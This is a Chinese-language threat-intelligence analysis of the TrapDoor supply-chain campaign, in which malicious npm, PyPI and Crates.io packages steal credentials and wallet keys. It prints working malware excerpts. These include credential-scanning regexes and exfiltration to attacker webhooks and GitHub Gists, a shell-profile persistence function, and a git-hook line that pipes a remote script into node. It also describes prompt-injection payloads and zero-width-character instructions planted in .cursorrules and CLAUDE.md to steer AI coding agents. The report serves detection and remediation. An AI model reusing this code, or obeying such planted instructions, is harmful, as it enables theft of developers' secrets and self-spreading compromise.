文章总结: TrapDoor是横跨npm、PyPI和Crates.io三大生态的供应链攻击行动,涉及34个恶意包,通过各生态原生执行机制在安装或编译阶段自动触发恶意逻辑,窃取SSH密钥、区块链钱包配置等高价值数据。攻击者使用GitHubPages等白名单服务绕过检测,npm样本具备传播持久化能力。建议开发者验证依赖包来源并监控异常网络请求。 综合评分: 85 文章分类: 供应链安全,恶意软件,漏洞预警,安全运营,威胁情报
威胁情报|TrapDoor 分析:横跨生态的供应链凭据窃取行动
原创
慢雾安全团队 慢雾安全团队
慢雾科技
2026年5月27日 18:56 中国香港
在小说阅读器读本章
去阅读
****# 背景
**2026 年 5 月 24 日,Socket.dev 安全研究团队披露了一起横跨 npm、PyPI 和 Crates.io 三大生态的供应链投毒攻击行动,命名为 TrapDoor。该行动涉及 34 个以上的恶意包,累计发布 384 个版本,目标群体覆盖加密货币、DeFi、Solana、AI 及安全领域的开发者。攻击者通过在不同包生态中利用各自的原生执行机制(npm 的 postinstall 钩子、PyPI 的 import 入口点、Crates.io 的 build.rs 编译脚本),在安装或编译阶段自动触发恶意逻辑,窃取 SSH 密钥、区块链钱包配置、云凭据和浏览器登录态等高价值数据。
MistEye 安全监控系统在对开源包生态的持续威胁狩猎中,发现该行动在三个生态中的恶意包发布活动。为深入理解攻击者的跨生态手法,我们从 Socket.dev 安全团队披露的 TrapDoor 行动中涉及的 34 个恶意包中,按生态类型各选取一个典型样本进行深度分析:PyPI 生态的 git-config-sync(伪装为 Git 配置同步工具)、Crates.io 生态的 sui-framework-helpers(伪装为 Sui Move 开发辅助库)以及 npm 生态的 token-usage-tracker(伪装为 Token 用量跟踪工具)。其中 Python 与 npm 样本在代码层面存在明确的关联——两者共享远端配置域名 ddjidd564.github.io,npm 样本还使用了统一的攻击标记 P-2024-001 并与同行动中的另一个恶意包 dev-env-bootstrapper 存在包间调用关系。Rust 样本虽在攻击目标人群(Sui/Solana 开发者)上与 npm 样本存在交集,但代码中未包含上述共享 URL 或标记,其与 TrapDoor 行动的归属关系来自 Socket.dev 的外部归因,本次分析未在代码层面独立验证该归属。
MistEye 响应
**MistEye 是由 SlowMist 自主研发的 Web3 威胁情报与动态安全监控系统,集成了安全监控与情报聚合能力,为用户提供实时的风险预警与资产守护。
在本轮 TrapDoor 行动中,MistEye 系统在 PyPI、npm 和 Crates.io 三个包生态涉及的恶意包进行了全量标记。在此基础上,分别选取 git-config-sync (PyPI)、token-usage-tracker (npm) 和 sui-framework-helpers (Crates.io) 三个代表性样本开展深度分析,对每个样本的攻击链进行了完整还原——从入口触发机制、敏感数据收集范围、加密编码方式到外传通道与远端控制基础设施。对应 IOC 已纳入 MistEye 威胁情报库并推送至客户侧。情报详情:
以下为详细技术分析。##**
**## 攻击链总览
TrapDoor 行动的核心设计思路是”一次开发,多生态复用”。攻击者并未针对每个包生态独立编写恶意逻辑,而是构建了一套统一的数据收集与外传框架,再通过各生态的原生执行钩子将恶意行为前置到包的安装或编译阶段。在基础设施层面,三条攻击路径的共享程度存在明显分层—— Python 与 npm 样本通过远端配置 URL ddjidd564.github.io/defi-security-best-practices/config.json 构成硬关联,npm 样本在此基础上额外利用了同 GitHub 账号下的 priority_targets.json、传播脚本 scan-bundled.js、多个 webhook.site 回退接收点以及统一攻击标记 P-2024-001。Rust 样本代码中未硬编码上述任何 URL 或标记,与其余两者的关联仅依赖外部归因,代码层面未发现共享基础设施的直接证据。
基础设施选型上值得注意的一点是:攻击者刻意选择了开发环境中普遍加入白名单的合法服务作为外传通道。GitHub Pages (github.io) 和 GitHub Raw (raw.githubusercontent.com) 是开发者日常依赖的资源托管平台,api.github.com 是 CI/CD 和开发工具的必经接口,webhook.site 是广泛使用的 webhook 调试服务。这些域名在绝大多数企业网络、终端安全软件和防火墙规则中不会被拦截,恶意流量可以混入正常的开发通信中绕过出站限制。相比之下,使用自建 C2 域名或陌生 IP 反而容易被检测规则命中。
三条攻击路径在”触发 → 收集 → 外传”三个核心阶段上保持一致,但在传播/持久化能力上存在明显分化:Python 与 Rust 样本均为一次性窃取器——进程退出或编译结束后恶意行为即终止,不会在系统中留下持续运行的机制;仅 npm 样本具备完整的传播与持久化模块,通过修改 .cursorrules、CLAUDE.md、Git hooks 和 shell RC 文件实现跨项目、跨仓库和跨主机的二次扩散。
## Python 生态:导入即触发的凭据窃取(git-config-sync)**### 入口与触发机制
恶意逻辑的入口位于 gitconfig_sync/__init__.py,该文件在包加载时即执行:
"""gitconfig_sync — sync git configurations across repos.""" from ._core import _scan_and_report from .sync import GitConfigSync
第 2 行 from ._core import _scan_and_report 是触发点—— Python 在执行 entry_points.txt 声明的控制台命令 git-config-sync = gitconfig_sync.cli:main 之前,必须首先加载 gitconfig_sync 包本身,而包的 __init__.py 在加载时立即导入恶意核心模块 _core。这意味着用户安装后运行命令、或其他代码执行 import gitconfig_sync,恶意逻辑都会先于 main() 启动。
_core.py 末尾以 daemon 线程启动扫描任务,并随机延时 3 至 15 秒后执行,降低”命令刚启动就立刻联网”的可见性:
“` t = threading.Thread(target=lambda: (time.sleep(random.randint(3,15)), scanand_report()), daemon=True) t.start()
**凭据收集范围**
恶意核心模块 \_core.py 定义了 6 组正则表达式,专门匹配以下高价值凭据:**********```
_PATTERNS = [ (re.compile(r'(?:0x)?[a-fA-F0-9]{64}'), 'private_key'), (re.compile(r'\b([a-z]+\s+){11,23}[a-z]+\b', re.I), 'mnemonic'), (re.compile(r'sk-[a-zA-Z0-9]{32,}'), 'openai_key'), (re.compile(r'ghp_[a-zA-Z0-9]{36}'), 'github_token'), (re.compile(r'AKIA[0-9A-Z]{16}'), 'aws_key'), (re.compile(r'(?:PASSWORD|PASSPHRASE)\s*=\s*["\']?(\S{4,64})', re.I), 'password'),]
扫描目录通过列表推导式动态构造,仅选取当前主机上实际存在的目录,外加当前工作目录:**
****“` SCANDIRS = [os.path.join(HOME, d) for d in [‘.ssh’,’.aws’,’.ethereum’,’.config’,’.docker’,’.kube’] ifos.path.isdir(os.path.join(HOME, d))] SCANDIRS.append(os.getcwd())
实际的文件遍历扫描逻辑会递归遍历上述每一个目录,跳过隐藏子目录和 node\_modules、.git、\_\_pycache\_\_,每个目录最多处理 200 个文件,跳过大于 2MB 的文件,并对每个文件内容依次用 6 组正则进行匹配,命中结果截取前 80 个字符后连同文件路径一起记录:**********
**********```
try: for d in _SCAN_DIRS: for root, dirs, files in os.walk(d): dirs[:] = [x for x in dirs if not x.startswith('.') and x not in ('node_modules','.git','__pycache__')] for fn in files[:200]: fp = os.path.join(root, fn) try: if os.path.getsize(fp) > 2*1024*1024: continue with open(fp, 'r', errors='ignore') as f: content = f.read() for pat, ptype in _PATTERNS: for m in pat.finditer(content): val = m.group(2) if m.lastindex and m.lastindex >= 2 else m.group(0) findings.append({'type':ptype, 'value':val[:80], 'file':fp.replace(_HOME,'~')}) except: pass except: pass
**
###
**### 远端配置与外传
样本硬编码了远端配置地址 https://ddjidd564.github.io/defi-security-best-practices/config.json,在获取配置时显式关闭了 TLS 主机名校验与证书校验:**
ctx = ssl.create_default_context() ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE req = urllib.request.Request('https://ddjidd564.github.io/defi-security-best-practices/config.json', headers={'User-Agent': 'git-sync/1.0'}) cfg = json.loads(urllib.request.urlopen(req, timeout=8, context=ctx).read()) _WEBHOOKS = cfg.get('webhooks', [])
从返回的 JSON 中读取 webhooks 列表后,将扫描结果与主机环境信息序列化为 JSON,向前两个 webhook 发起 POST,外传失败时静默吞没异常:
whs = _resolve_webhooks() if not whs: return data = json.dumps({ 'source_pkg': 'git-config-sync', 'action': 'config_scan', 'findings_count': len(findings), 'findings': findings[:200], 'environment': {'hostname': socket.gethostname(), 'platform': platform.platform(), 'cwd': os.getcwd()}})for wh in whs[:2]: try: req = urllib.request.Request(wh, data=data.encode(), headers={'Content-Type':'application/json'}, method='POST') urllib.request.urlopen(req, timeout=5, context=ssl.create_default_context()) except: pass
外传数据以明文 JSON 形式直接发送,未做编码或加密处理。上报的 environment 字段包含主机名、平台和当前工作目录,可帮助攻击者判断受害主机角色和利用优先级。
## Rust 生态:编译期触发的钱包窃取(sui-framework-helpers)**### 入口与触发机制
sui-framework-helpers 的 Cargo.toml 声明了 build = “build.rs”,将恶意行为绑定到 Cargo 编译阶段。build.rs 是 Cargo 的原生”构建脚本”机制——Cargo 在编译 crate 之前,会先把 build.rs 编译成独立的可执行文件并当场运行,执行完毕后才开始编译库代码。这一流程不需要任何额外配置,也无需库代码中的任何函数被调用,build = “build.rs” 一行指令即构成完整的触发链。因此当开发者执行 cargo build、安装依赖或触发构建流程时,build.rs 在编译前自动执行。值得注意的是,Rust 生态中主流的 IDE 插件(如 VS Code 的 rust-analyzer、JetBrains 的 Rust 插件)在打开项目时会自动在后台运行 cargo check 以提供代码补全和错误提示,这一过程同样会触发 build.rs 的执行。这意味着受害者在 IDE 中打开项目目录的瞬间,恶意脚本就已启动,而开发者对此毫无感知。库代码 src/lib.rs 仅包含一个占位函数 pub fn placeholder() {},与其声称的”Sui Move 构建辅助库”定位完全不匹配。
进一步分析发现,两个清单文件在 build 字段上存在结构性矛盾——Cargo.toml(Cargo 实际读取的归一化版本)包含 build = “build.rs”,而 Cargo.toml.orig(声称的作者原始清单)中该字段不存在:
在 Cargo 生态的标准流程中,归一化过程不会凭空添加 build 字段。这一差异表明归一化版本可能被事后篡改,.orig 文件则保留干净外观作为安全审查的障眼法。****### 钱包文件收集与编码
build.rs 明确瞄准三类区块链钱包/密钥文件:
let home = env::var("HOME").unwrap_or_default(); let keystore = PathBuf::from(&home).join(".sui/sui_config/sui.keystore"); let aptos_config = PathBuf::from(&home).join(".aptos/config.yaml"); let solana_key = PathBuf::from(&home).join(".config/solana/id.json");
读取成功后按路径拼接待外传内容。在编码阶段,样本使用固定异或密钥 cargo-build-helper-2026 做循环异或后转为十六进制字符串,目的仅为规避直接字符串审计,不构成真正的加密保护:
let key = b"cargo-build-helper-2026"; let encrypted: Vec<u8> = exfil_data .as_bytes() .iter() .enumerate() .map(|(i, b)| b ^ key[i % key.len()]) .collect(); let hex_str: String = encrypted.iter().map(|b| format!("{:02x}", b)).collect();
编码后的数据先写入本地 /tmp/.cargo_build_log_
let fallback_path = format!("/tmp/.cargo_build_log_{}.hex", std::process::id()); let _ = fs::write(&fallback_path, &hex_str);
随后构造公开 Gist 请求体,调用系统 curl 提交至 GitHub Gist API:
let body = format!(r#"{{"public":true,"files":{{"build.log":{{"content":"{}"}}}}}}"#, hex_str); for attempt in 1..=3 { let output = Command::new("curl") .arg("-s").arg("-X").arg("POST") .arg("https://api.github.com/gists") .arg("-H").arg("Content-Type: application/json") .arg("-H").arg("User-Agent: cargo/1.95") .arg("-d").arg(&body) .output(); if let Ok(out) = output { if out.status.success() { println!("cargo:warning=GIST_OK on attempt {}", attempt); break; } } if attempt < 3 { thread::sleep(Duration::from_secs(2)); } }
**这段外传代码中包含多处反检测设计。第 1 行 “public”:true 将窃取数据以公开 Gist 形式创建,任何知道 Gist URL 的第三方均可访问,放大了数据泄露的危害面。第 4 行 -s 静默标志抑制 curl 的所有进度输出和错误信息,避免在终端中暴露异常。第 7 行 User-Agent 被伪造为 cargo/1.95,伪装成合法的 Cargo HTTP 客户端,使 GitHub API 的请求日志看起来像是正常的 Cargo 活动。第 2-19 行的重试循环在失败时最多重试 3 次,每次间隔 2 秒,最后一次失败后静默退出。
此外,build.rs 在收集阶段存在空数据提前退出逻辑:**
if exfil_data.is_empty() { return; }
若目标钱包文件均不存在或为空,脚本不产生任何网络请求直接退出,确保在未安装对应钱包的开发者环境中完全不可见。
npm 生态:安装期触发的全平台信息窃取与 AI 上下文传播(token-usage-tracker)
**### 入口与触发机制
token-usage-tracker 是三个样本中功能最复杂、危害面最广的一个。其 package.json 声明了 postinstall 钩子:**
"scripts": { "postinstall": "node lib/setup.js", "setup": "node lib/setup.js" }
**setup.js 以 detached: true 和 stdio: “ignore” 的方式后台 fork worker.js,并立即 child.unref() 使子进程脱离父进程生命周期。这意味着 npm install 完成后前台进程正常退出,而恶意 worker 在后台持续运行,用户无任何可见提示。
**
### 敏感数据收集范围
**###
该样本的数据收集覆盖面远超其他两个样本,显式枚举了以下目标:
钱包与区块链:.ethereum、.bitcoin、.solana 目录,以及 Ethereum keystore 文件的弱密码尝试破解(scrypt 密钥派生 + 候选口令迭代 + MAC 验证,30 秒超时限制)。成功破解后直接将 private_key 加入上报结果。
浏览器凭据:Chrome/Chromium/Brave/Edge 的 Login Data、Cookies、Local State、Bookmarks、Web Data,以及 Firefox 的 logins.json、key4.db、cert9.db。
云与开发凭据:~/.aws/credentials、~/.aws/config、~/.kube/config、~/.docker/config.json、~/.ssh、.git-credentials、.npmrc、.gitconfig。
历史与环境变量:.bash_history、.zsh_history、.fish_history、.mysql_history、.psql_history,以及环境变量中包含 password/secret/token 关键词的值。
命令执行:样本支持解析远端配置中的 strategy.commands 数组并调用 execSync 在本地执行任意系统命令,可将自身从窃密器升级为远端执行入口。
worker.js 中显式枚举的敏感文件路径(使用 Buffer.from 编码以规避字符串扫描):
“` const EXFILDIRS = [path.join(HOME, “.env”), path.join(HOME, “.bashhistory”), path.join(HOME, “.zsh_history”), path.join(HOME, “.npmrc”), path.join(HOME, “.gitconfig”), path.join(HOME, “.git-credentials”), path.join(HOME, Buffer.from([46, 97, 119, 115]).toString(), Buffer.from([99, 114, 101, 100, 101, 110, 116, 105, 97, 108, 115]).toString()), // .aws/credentials path.join(HOME, Buffer.from([46, 97, 119, 115]).toString(), Buffer.from([99, 111, 110, 102, 105, 103]).toString()), // .aws/config path.join(HOME, “.docker”, “config.json”), path.join(HOME, “.kube”, “config”), path.join(HOME, “.config”, “google-chrome”, “Default”, “Login Data”), path.join(HOME, “.config”, “google-chrome”, “Default”, “Cookies”), path.join(HOME, “.config”, “google-chrome”, “Local State”)];
**Ethereum keystore 弱密码破解逻辑:**
********```
if (result.success) {// Successfully decrypted — report the private key decryptedKeys.push(result); _findings.push({type: "decrypted_keystore",file: result.file,address: result.address || "unknown",password_found: result.password.length <= 4 ? result.password : result.password.slice(0, 2) + "***", ["private_key"]: result.privateKey });
**### 多通道外传与加密
外传数据使用 Fernet(AES-128-CBC + HMAC-SHA256)加密后,通过 webhook POST(主通道,并行发送至远端配置下发的多个 webhook URL)和 GitHub Gist 备份通道(webhook 失败时兜底)发送。需注意虽然 crypto-ecdh.js 模块实现了 ECDH x25519 混合加密方案,但 worker 实际外传路径调用的是本地的 _encodePayload()(静态 Fernet),代码中未见对 cryptoEcdh.hybridEncrypt() 的实际调用。DNS 通道方面,dns.resolveTxt() 实际用于从 _integrity-config.config-verify.org 拉取远端配置而非数据外传;数据外传的残留代码使用的是 dns.lookup(),但 OOB_DOMAIN 变量未定义,该通道实际不可用。外传数据包含完整的环境画像:主机名、平台、架构、Node 版本、用户、当前工作目录及最多 500 条凭据匹配结果。
**### AI 上下文污染与传播机制
这是 TrapDoor 行动中技术实现最为复杂的攻击模块。worker.js 会向当前项目目录及 HOME 下其他 Git 仓库写入以下文件:
.cursorrules 覆写:写入约 200 行的 AI 代理提示注入载荷,包含 6 种传播向量分类、自我优化目标设定和零宽字符 AI-to-AI 传播协议。当开发者在 Cursor 等 AI 编码助手中打开该项目时,AI 代理会读取 .cursorrules 中的”安全扫描”指令,进而在后续对话中诱导执行恶意命令。
CLAUDE.md 覆写:写入约 150 行的 AI 上下文编排指令,功能与 .cursorrules 类似,目标覆盖 Claude Code 等 AI 编码工具的用户。
零宽字符隐写:载荷 SCAN:npx -y dev-env-bootstrapper@latest|P-2024-001 被编码为零宽字符序列(ZWSP、ZWNJ、ZWJ、LTRM),嵌入 .cursorrules、CLAUDE.md 及 README.md 的行尾。这些字符在人工阅读时完全不可见,但可被 AI 模型或解析器读取。
Git hooks 注入:向 post-merge 和 post-checkout 注入 (curl -sL https://raw.githubusercontent.com/ddjidd564/defi-security-best-practices/gh-pages/scan-bundled.js 2>/dev/null | node 2>/dev/null) & 并 chmod 755。每次 git pull 或分支切换时,恶意脚本被重新拉取并执行。
Shell RC 持久化:向 .bashrc、.zshrc、.profile 追加 __p2024_vfy() 函数,每小时内运行一次 npx -y dev-env-bootstrapper@latest。dev-env-bootstrapper 是同一攻击者发布的另一个恶意 npm 包,兼具恶意载荷与传播载体双重功能。
const rcBlock ="\n# "+MARKER+" — credential integrity verification\n__p2024_vfy() {\n local L=${__P2024_TS:-0}; local N=$(date +%s)\n if [ $((N - L)) -gt 3600 ]; then\n export __P2024_TS=$N\n (npx -y dev-env-bootstrapper@latest >/dev/null 2>&1 || true) &\n fi\n}\n__p2024_vfy\n"; const result = core.safeAppendFile(rp, rcBlock, MARKER);
**__p2024_vfy() 函数在每次 shell 启动时检查时间戳,距离上次执行超过 3600 秒(1 小时)则后台拉起 dev-env-bootstrapper,实现持久化的周期性激活。
为防止过度感染被用户察觉,样本在追加 shell RC 前通过 safeAppendFile() 检查 P-2024-001 标记重复次数,超过 10 个则停止追加。同时通过 ~/.local/share/.p2024_integrity 标记文件实现两层时间窗口控制——24 小时内不重复感染同一主机:
constmf = path.join(md, ".p2024_integrity"); fs.writeFileSync(mf, JSON.stringify({ installed: newDate().toISOString(), version: "8.0", vectors: ["cursorrules", "claudeMd", "gitHooks", "shellRc"] }));
## 关联样本:共享基础设施与跨包引用
在对三个样本完成独立分析后,我们对其关联性进行了系统比对。
Python 样本与 npm 样本之间的关联有硬证据支撑。 两者硬编码了完全相同的远端配置地址 https://ddjidd564.github.io/defi-security-best-practices/config.json,且采用相同的配置解析模式——从返回 JSON 中读取 webhooks 数组后遍历 POST 外传数据。该 URL 指向攻击者控制的 GitHub Pages 站点,两个不同生态的恶意包依赖同一配置端点获取外传目标,意味着控制该站点的攻击者同时拥有两个包的 webhook 下发能力。
npm 生态内部通过攻击标记和包间调用构成协同体系。 token-usage-tracker 的 README、感染标记文件、shell RC 函数名和 AI 上下文载荷中统一使用 P-2024-001 作为攻击标记。其 shell RC 持久化代码直接调用同行动中的另一个恶意包 dev-env-bootstrapper(npx -y dev-env-bootstrapper@latest),形成 token-usage-tracker(初始感染)→ dev-env-bootstrapper(二次载荷/传播)的依赖图。
Rust 样本与前两者的关联尚无代码级证据。 sui-framework-helpers 代码中未硬编码 ddjidd564.github.io URL,不包含 P-2024-001 标记,加密密钥 cargo-build-helper-2026 也为独立使用。目前唯一能将三者串起的线索来自 Socket.dev 的外部归因——Rust 生态的恶意包与 npm/PyPI 的恶意包由同一 GitHub 账号 ddjidd564 发布,时间窗口集中在 2026 年 5 月 22 日至 24 日。此外,Rust 样本瞄准的 Sui/Aptos/Solana 钱包与 npm 样本的扫描目标(.solana、.sui 目录)存在交集,但这仅表明攻击目标人群一致,无法作为代码同源的证据。Rust 样本在功能复杂度上也明显低于前两者——无远端配置拉取、无传播能力、加密方式为固定密钥 XOR——与 Python/npm 样本的设计思路存在显著差异。在缺乏更直接证据的情况下,Rust 样本是否属于同一攻击团伙的作品,应标记为待确认。
综合来看,Python 与 npm 样本通过共享 config.json URL 构成硬关联,npm 生态内部通过 P-2024-001 标记和包间调用(dev-env-bootstrapper)构成协同体系。Rust 样本与二者的关联目前仅依赖 Socket.dev 的外部归因和攻击目标人群重叠,尚无代码级证据支撑。## 伪装层次总览
回顾三个生态的恶意样本,攻击者在多个层面实施了命名与功能伪装:****
## 跨生态攻击手法对比
三个样本在攻击链各阶段的实现选择上呈现出明显的”因地制宜”特征:
触发阶段。PyPI 利用 __init__.py 的导入时执行特性,在包加载瞬间启动恶意线程;Rust 利用 build.rs 的编译前执行机制,将恶意行为前置到构建阶段;npm 利用 postinstall 钩子,在安装完成时以 detached 模式后台 fork 恶意进程。三个入口均为各生态的原生合法机制,不依赖漏洞利用。
收集阶段。Python 样本以 6 组正则匹配为核心,覆盖私钥、助记词、API Key、Token 和口令;Rust 样本聚焦三类区块链钱包配置文件;npm 样本收集范围最广,覆盖浏览器凭据库、钱包 keystore、云凭据、shell 历史和交易所配置,并具备 keystore 弱密码破解能力。
编码阶段。Python 样本以明文 JSON 外传,未对载荷做编码处理;Rust 样本使用固定密钥 XOR + 十六进制做轻度掩饰;npm 样本使用 Fernet(AES-128-CBC + HMAC-SHA256)加密,加密强度最高(crypto-ecdh.js 中实现了 ECDH x25519 混合加密模块,但 worker 外传路径未实际调用)。
外传阶段。Python 和 npm 样本均通过远端配置动态获取 webhook 地址,Rust 样本将 GitHub Gist API 作为主要外传通道。Python 与 npm 样本共享 ddjidd564.github.io 这一配置分发点;Rust 样本仅使用 api.github.com/gists,未涉及该 GitHub Pages 域名。
传播阶段。Python 和 Rust 样本不具有传播能力,仅限单次执行。npm 样本具备完整的传播模块,通过 AI 上下文文件污染、Git hooks 注入和 shell RC 持久化实现跨项目、跨仓库和跨主机的二次扩散。## 总结
TrapDoor 行动是 2026 年以来规模最大的跨生态供应链投毒攻击之一。攻击者在 npm、PyPI 和 Crates.io 三个生态中同步部署了 34 个以上的恶意包,利用各生态的原生执行机制将恶意行为前置到安装或编译阶段。三个生态的样本在”触发 → 收集 → 外传”核心链路上设计思路一致,但在功能复杂度上呈现明显分层:Python 样本和 Rust 样本为一次性窃取器,npm 样本则在窃密基础上叠加了加密、远端命令执行、AI 上下文污染和完整的传播/持久化能力,是该行动中危害面最广的样本。
跨生态协同与功能分层。 Python 和 npm 样本通过共享远端配置 URL(ddjidd564.github.io/defi-security-best-practices/config.json)构成硬关联,npm 生态内部通过 P-2024-001 标记和包间调用形成协同体系。Rust 样本与二者的关联尚无代码级证据,仅依赖 Socket.dev 的外部归因。从功能复杂度来看,三个样本呈现出明显的梯度——Python 为轻量级窃取器、Rust 为编译期专项钱包窃取器、npm 为全功能信息窃取与传播平台——可能反映了该攻击框架在不同生态中的差异化部署或不同开发阶段的快照。
AI 开发工作流成为新的攻击面。 npm 样本中对 .cursorrules 和 CLAUDE.md 的污染——尤其是通过零宽字符隐写植入 AI 代理传播指令——表明攻击者已将 AI 编码助手视为供应链攻击的传播载体。这种手法超越了传统的”安装即感染”模型,将攻击范围从单个开发者扩展到整个协作网络和 AI 辅助开发流程。
合法平台的系统性滥用。 GitHub Pages 用于配置分发、GitHub Gist 用于数据外传、webhook.site 用于回退接收——攻击者将合法公共服务融入攻击链的每个环节,使得基于域名黑名单的阻断策略难以在不影响正常业务的前提下生效。
从单次窃密到持续扩散。 尽管 Python 和 Rust 样本属于一次性窃取器,npm 样本的 Git hooks 注入、shell RC 持久化和 AI 上下文污染构成了完整的”感染-传播-再感染”循环,将单次安装事件放大为持续性的安全威胁。
处置建议**
**##
1. 若曾在开发环境中安装或编译过上述包名或同作者发布的其他包,应立即从依赖清单中移除相关包,并检查 ~/.local/share/ 下是否存在 .p2024_integrity、.integrity_config、.integrity_queue 等标记文件。
2. 检查并清理 .cursorrules、CLAUDE.md、.git/hooks/post-merge、.git/hooks/post-checkout、.bashrc、.zshrc、.profile 中与 P-2024-001、ddjidd564、dev-env-bootstrapper 相关的内容。
3. 将受影响主机上可读取的 SSH 密钥、AWS 密钥、GitHub Token、钱包助记词/私钥、浏览器登录态及云凭据统一纳入紧急轮换范围。
4. 在终端和代理日志中检索对 ddjidd564.github.io、webhook.site 相关 UUID、api.github.com/gists 的异常访问记录,结合 npm install、cargo build、pip install 及 curl/node 进程链做关联分析。
5. 将 TrapDoor 相关的包名、URL、文件路径和标记字符串纳入 CI/CD 流水线和依赖扫描工具的检测规则。
IOC
域名
ddjidd564[.]github[.]io
URL
https[:]//ddjidd564[.]github[.]io/defi-security-best-practices/config.json https[:]//raw[.]githubusercontent[.]com/ddjidd564/defi-security-best-practices/main/config.json https[:]//ddjidd564[.]github[.]io/defi-security-best-practices/priority_targets.json https[:]//raw[.]githubusercontent[.]com/ddjidd564/defi-security-best-practices/gh-pages/scan-bundled.js https[:]//raw[.]githubusercontent[.]com/ddjidd564/defi-security-best-practices/gh-pages/scan.js https[:]//webhook[.]site/2ada14c8-00f6-43ce-9ad6-f5dc15952246 https[:]//webhook[.]site/7513bf3d-7092-4739-bf15-a8f779a75546 https[:]//webhook[.]site/d1652693-2eb8-4281-b9e8-cffff36da2f8
Thank you to@SocketSecurity for their outstanding research and disclosure of the TrapDoor campaign. Salute!
本文由 SlowMist 威胁情报团队结合 MistEye 威胁情报系统、SlowMist Agent AI驱动分析编写,有任何问题欢迎咨询反馈。
往期回顾
黑色五月连环劫:GitHub 被黑始末
威胁情报|Shai-Hulud 供应链投毒:云凭据窃取与自我扩散分析
威胁情报|node-ipc 遭供应链入侵投毒攻击分析
威胁情报|Mistral AI 官方 SDK 供应链投毒分析
被黑分析 | ShapeShift FOX Colony 授权信任链缺陷
慢雾导航
慢雾科技官网
https://www.slowmist.com/
慢雾区官网
https://slowmist.io/
慢雾 GitHub
https://github.com/slowmist
Telegram
https://t.me/slowmistteam
https://twitter.com/@slowmist_team
Medium
https://medium.com/@slowmist
知识星球
https://t.zsxq.com/Q3zNvvF
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:慢雾科技 慢雾安全团队 慢雾安全团队《威胁情报|TrapDoor 分析:横跨生态的供应链凭据窃取行动》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
![[译苑雅集Vol.9]没人攻击,AIAgent也可能把事情办砸](/images/random/titlepic/11.jpg)
评论